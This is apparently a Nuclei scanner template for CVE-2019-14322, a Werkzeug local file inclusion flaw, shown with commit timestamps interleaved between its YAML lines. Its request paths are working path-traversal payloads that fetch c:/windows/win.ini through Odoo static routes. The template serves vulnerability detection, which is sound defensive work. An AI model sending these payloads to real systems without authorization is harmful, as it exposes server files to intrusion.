2021-01-02 04:59:06 +00:00
id : CVE-2019-14322
2020-07-31 17:22:10 +00:00
info :
2022-06-14 15:12:56 +00:00
name : Pallets Werkzeug <0.15.5 - Local File Inclusion
2020-07-31 17:22:10 +00:00
author : madrobot
severity : high
2022-06-20 17:30:13 +00:00
description : |
Pallets Werkzeug before 0.15.5 is susceptible to local file inclusion because SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames.
2022-04-22 10:38:41 +00:00
reference :
- https://palletsprojects.com/blog/werkzeug-0-15-5-released/
- http://packetstormsecurity.com/files/163398/Pallets-Werkzeug-0.15.4-Path-Traversal.html
2022-06-14 15:12:56 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-14322
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-14322
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : cve2019,lfi,odoo,packetstorm,cve
2020-07-31 17:22:10 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/base_import/static/c:/windows/win.ini"
- "{{BaseURL}}/web/static/c:/windows/win.ini"
- "{{BaseURL}}/base/static/c:/windows/win.ini"
2021-09-02 11:59:10 +00:00
stop-at-first-match : true
2020-07-31 17:22:10 +00:00
matchers-condition : and
matchers :
2022-06-20 17:30:13 +00:00
2020-07-31 17:22:10 +00:00
- type : word
2022-06-20 17:30:13 +00:00
part : body
2020-07-31 17:22:10 +00:00
words :
- "bit app support"
- "fonts"
- "extensions"
condition : and
2022-06-14 15:12:56 +00:00
2022-06-20 17:30:13 +00:00
- type : status
status :
- 200
2022-06-14 15:12:56 +00:00
# Enhanced by mp on 2022/06/14